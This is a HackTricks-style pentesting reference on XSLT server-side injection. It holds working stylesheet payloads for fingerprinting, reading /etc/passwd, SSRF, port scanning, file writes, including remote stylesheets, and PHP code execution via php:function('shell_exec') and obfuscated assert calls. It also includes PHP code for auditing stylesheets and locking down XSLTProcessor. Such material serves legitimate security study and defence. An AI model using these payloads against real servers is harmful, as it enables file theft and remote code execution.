
XSLT Server Side Injection (Extensible Stylesheet Language Transformations)

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Basic Information

XSLT is a technology used to transform XML documents into other formats. It exists in three versions, 1, 2 and 3, with version 1 being the most commonly used. The transformation can be run on the server or in the browser.

The most frequently used frameworks include:

  • Libxslt from Gnome,
  • Xalan from Apache,
  • Saxon from Saxonica.

To exploit vulnerabilities associated with XSLT, the xsl tags must be stored on the server side and that content must then be accessed. An illustration of such a vulnerability is documented in the following source:

Example - Tutorial

```bash
sudo apt-get install default-jdk
sudo apt-get install libsaxonb-java libsaxon-java
```

{% code title="xml.xml" %}
```xml
<?xml version="1.0" encoding="UTF-8"?>
<catalog>
<cd>
<title>CD Title</title>
<artist>The artist</artist>
<company>Da Company</company>
</cd>
</catalog>
```
{% endcode %}

{% code title="xsl.xsl" %}
```xml
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<h2>The Super title</h2>
<table border="1">
<tr bgcolor="#9acd32">
<td><xsl:value-of select="catalog/cd/title"/></td>
<td><xsl:value-of select="catalog/cd/artist"/></td>
</tr>
</table>
</xsl:template>
</xsl:stylesheet>
```
{% endcode %}


```bash
saxonb-xslt -xsl:xsl.xsl xml.xml

Warning: at xsl:stylesheet on line 2 column 80 of xsl.xsl:
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
<h2>The Super title</h2>
<table border="1">
<tr bgcolor="#9acd32">
<td>CD Title</td>
<td>The artist</td>
```

Fingerprinting

{% code title="detection.xsl" %}
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
Version: <xsl:value-of select="system-property('xsl:version')" /><br />
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
<xsl:if test="system-property('xsl:product-name')">
Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
</xsl:if>
<xsl:if test="system-property('xsl:product-version')">
Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
</xsl:if>
<xsl:if test="system-property('xsl:is-schema-aware')">
Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
</xsl:if>
<xsl:if test="system-property('xsl:supports-serialization')">
Supports Serialization: <xsl:value-of select="system-property('xsl:supports-serialization')" /><br />
</xsl:if>
<xsl:if test="system-property('xsl:supports-backwards-compatibility')">
Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supports-backwards-compatibility')" /><br />
</xsl:if>
</xsl:template>
</xsl:stylesheet>
```
{% endcode %}

And run:

```bash
$ saxonb-xslt -xsl:detection.xsl xml.xml

Warning: at xsl:stylesheet on line 2 column 80 of detection.xsl:
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
<h2>XSLT identification</h2><b>Version:</b>2.0<br><b>Vendor:</b>SAXON from Saxonica<br><b>Vendor URL:</b><br>
```

Read Local File

{% code title="read.xsl" %}
```xml
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
```
{% endcode %}

```bash
$ saxonb-xslt -xsl:read.xsl xml.xml

Warning: at xsl:stylesheet on line 1 column 111 of read.xsl:
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
<?xml version="1.0" encoding="UTF-8"?>root:x:0:0:root:/root:/bin/bash
```


Server-Side Request Forgery (SSRF)

```xml
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:include href=""/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>
```


There may be more or fewer functions available depending on the XSLT version in use:

Fingerprinting

Upload this and obtain information

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
Version: <xsl:value-of select="system-property('xsl:version')" /><br />
Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
<xsl:if test="system-property('xsl:product-name')">
Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
</xsl:if>
<xsl:if test="system-property('xsl:product-version')">
Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
</xsl:if>
<xsl:if test="system-property('xsl:is-schema-aware')">
Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
</xsl:if>
<xsl:if test="system-property('xsl:supports-serialization')">
Supports Serialization: <xsl:value-of select="system-property('xsl:supports-serialization')" /><br />
</xsl:if>
<xsl:if test="system-property('xsl:supports-backwards-compatibility')">
Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:supports-backwards-compatibility')" /><br />
</xsl:if>
</xsl:template>
</xsl:stylesheet>
```
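For a service that stores uploaded stylesheets, a server-side check can flag the constructs the fingerprinting and later payloads on this page rely on before the file is accepted. This is an added example in PHP, not code from the original page; it assumes the PHP DOM extension and treats XHTML literal result elements as benign.

```php
<?php
// Added example, not from the original page: defence-in-depth audit of a
// user-supplied stylesheet before it is stored server-side. It flags the
// constructs the payloads above rely on; locking down the processor stays the primary control.
function auditStylesheet(string $xslData): array
{
    $xslNs = 'http://www.w3.org/1999/XSL/Transform';
    $findings = [];
    // A stylesheet never needs a DOCTYPE; that is how the XXE variant pulls in /etc/passwd.
    if (stripos($xslData, '<!DOCTYPE') !== false) {
        $findings[] = 'DOCTYPE / entity declaration present';
    }
    $prev = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $wellFormed = $doc->loadXML($xslData, LIBXML_NONET);   // never fetch DTDs or entities over the network
    libxml_use_internal_errors($prev);
    if (!$wellFormed) {
        return ['not well-formed XML'];
    }
    // XPath calls that read files, probe the network, fingerprint the engine
    // (system-property) or invoke a prefixed extension function such as php:function().
    $riskyCall = '/\b(document|unparsed-text|system-property)\s*\(|\b[A-Za-z_]\w*:[A-Za-z_][\w-]*\s*\(/';
    foreach ($doc->getElementsByTagName('*') as $el) {
        $ns = $el->namespaceURI ?? '';
        // Elements outside the XSL namespace that are not literal (X)HTML result
        // elements are extension instructions (redirect:write, exsl:document, ...).
        if ($ns !== '' && $ns !== $xslNs && $ns !== 'http://www.w3.org/1999/xhtml') {
            $findings[] = "extension element {$el->nodeName} ({$ns})";
        }
        // Instructions that pull in other stylesheets or write output files.
        if ($ns === $xslNs && in_array($el->localName, ['include', 'import', 'result-document'], true)) {
            $findings[] = "xsl:{$el->localName} href=" . $el->getAttribute('href');
        }
        foreach ($el->attributes as $attr) {
            if (preg_match($riskyCall, $attr->value, $m)) {
                $findings[] = "risky XPath in {$el->nodeName}/@{$attr->name}: {$m[0]}";
            }
        }
    }
    return array_values(array_unique($findings));
}

// Constructed sample: the opendir payload from the directory-listing section of this page.
$sample = '<?xml version="1.0"?><xsl:stylesheet version="1.0"'
    . ' xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">'
    . '<xsl:template match="/"><xsl:value-of select="php:function(\'opendir\',\'/path/to/dir\')"/>'
    . '</xsl:template></xsl:stylesheet>';
print_r(auditStylesheet($sample));
```

On the constructed sample the php:function() call inside @select is reported; the prefixed-call pattern will also flag legitimate extension functions, so tune the allow-list of namespaces to what the application actually needs.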


Server-Side Request Forgery (SSRF)

```xml
<esi:include src="" stylesheet="">
```

Javascript Injection

```xml
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/">
<script>confirm("We're good");</script>
</xsl:template>
</xsl:stylesheet>
```

Directory listing (PHP)

Opendir + readdir

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="php:function('opendir','/path/to/dir')"/>
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
</xsl:template>
</xsl:stylesheet>
```

Assert (var_dump + scandir + false)

```xml
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
<xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)))==3')" />
<br />
</body>
</html>
```

Read files

Internal - PHP

```xml
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
```

Internal - XXE

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "/etc/passwd">]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
&ext_file;
</xsl:template>
</xsl:stylesheet>
```

Through HTTP

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:value-of select="document('/etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
```

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xsl:stylesheet [
<!ENTITY passwd SYSTEM "file:///etc/passwd" >]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
&passwd;
</xsl:template>
</xsl:stylesheet>
```

Internal (PHP function)

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="php:function('file_get_contents','/path/to/file')"/>
</xsl:template>
</xsl:stylesheet>
```

```xml
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
<xsl:copy-of name="asd" select="php:function('assert','var_dump(file_get_contents(scandir(chr(46).chr(47))[2].chr(47).chr(46).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100)))==3')" />
<br />
</body>
</html>
```

Port scan

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="document('')"/>
</xsl:template>
</xsl:stylesheet>
```

Write to a file

XSLT 2.0

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
<xsl:template match="/">
<xsl:result-document href="local_file.txt">
<xsl:text>Write Local File</xsl:text>
</xsl:result-document>
</xsl:template>
</xsl:stylesheet>
```

Xalan-J extension

```xml
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:redirect="http://xml.apache.org/xalan/redirect" extension-element-prefixes="redirect">
<xsl:template match="/">
<redirect:open file="local_file.txt"/>
<redirect:write file="local_file.txt">Write Local File</redirect:write>
<redirect:close file="local_file.txt"/>
</xsl:template>
</xsl:stylesheet>
```

Include external XSL

Other ways to write files are covered in the PDF

```xml
<xsl:include href="http://external.web/external.xsl"/>
```

```xml
<?xml version="1.0" ?>
<?xml-stylesheet type="text/xsl" href="http://external.web/ext.xsl"?>
```

Execute code

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="php:function('shell_exec','sleep 10')" />
</xsl:template>
</xsl:stylesheet>
```

```xml
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
<xsl:copy-of name="asd" select="php:function('assert','var_dump(scandir(chr(46).chr(47)));')" />
<br />
</body>
</html>
```
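The document('/etc/passwd'), php:function() and file-write payloads in the sections above only succeed because the processor is left at its defaults. As an added example (not code from the original page), this is how PHP's XSLTProcessor is locked down before applying a stylesheet that the application does not control; it assumes the PHP xsl extension is installed, and the XSL::stringToUrl name in the comment is the class from the static-function section below, used only to illustrate an allow-list.

```php
<?php
// Added example, not from the original page: apply an untrusted stylesheet with
// PHP's XSLTProcessor locked down, so the document('/etc/passwd'), php:function()
// and file-write payloads above are refused instead of touching the server.
function transformUntrusted(string $xmlData, string $xslData): string
{
    $prevErrors = libxml_use_internal_errors(true);
    libxml_clear_errors();
    // LIBXML_NONET: nothing is fetched over the network while parsing.
    // LIBXML_NOENT is deliberately absent, so the external entity used by the
    // XXE payload is never substituted.
    $xml = new DOMDocument();
    $xsl = new DOMDocument();
    if (!$xml->loadXML($xmlData, LIBXML_NONET) || !$xsl->loadXML($xslData, LIBXML_NONET)) {
        $err = libxml_get_last_error();
        libxml_use_internal_errors($prevErrors);
        throw new RuntimeException('input rejected' . ($err ? ': ' . $err->message : ''));
    }
    $proc = new XSLTProcessor();
    // php:function() only exists after registerPHPFunctions() is called; calling it with no
    // argument exposes every PHP function (shell_exec, assert, file_get_contents). If a
    // callback is genuinely needed, allow-list it: $proc->registerPHPFunctions(['XSL::stringToUrl']);
    // Deny file reads (document()), file writes and directory creation (exsl:document
    // style outputs) and all network access from inside the stylesheet. The default,
    // XSL_SECPREF_DEFAULT, only blocks writes; file and network reads stay allowed.
    $proc->setSecurityPrefs(
        XSL_SECPREF_READ_FILE | XSL_SECPREF_WRITE_FILE | XSL_SECPREF_CREATE_DIRECTORY
        | XSL_SECPREF_READ_NETWORK | XSL_SECPREF_WRITE_NETWORK
    );
    $out = $proc->importStylesheet($xsl) ? $proc->transformToXml($xml) : false;
    $err = libxml_get_last_error();
    libxml_use_internal_errors($prevErrors);
    if ($out === false || ($err && $err->level >= LIBXML_ERR_ERROR)) {
        // A denied document() read surfaces as a libxslt "read rights ... denied" error.
        throw new RuntimeException('transformation refused' . ($err ? ': ' . $err->message : ''));
    }
    return $out;
}

// Constructed demo: the page's document('/etc/passwd') payload against the locked-down processor.
$xml = '<catalog><cd><title>CD Title</title></cd></catalog>';
$xsl = '<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">'
     . '<xsl:template match="/"><xsl:value-of select="document(\'/etc/passwd\')"/></xsl:template></xsl:stylesheet>';
try {
    echo transformUntrusted($xml, $xsl), PHP_EOL;
} catch (RuntimeException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```

Whichever branch the demo takes, the contents of /etc/passwd never reach the output; a stylesheet that needs none of these capabilities loses nothing under these preferences.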

Execute code using other frameworks (see the PDF)

More Languages

On this page you can find examples of RCE in other languages: (C#, Java, PHP)

Accessing static PHP class functions

The following function calls the static method stringToUrl of the class XSL:

```xml
<!-- More complex test to call a php class function -->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
<xsl:output method="html" version="XHTML 1.0" encoding="UTF-8" indent="yes" />
<xsl:template match="root">
<!-- We use the php prefix to call the static class function stringToUrl() -->
<xsl:value-of select="php:function('XSL::stringToUrl','une_superstring-àÔ|modifier')" />
<!-- Output: 'une_superstring ao modifier' -->
</xsl:template>
</xsl:stylesheet>
```

More Payloads

Brute-Force Detection List


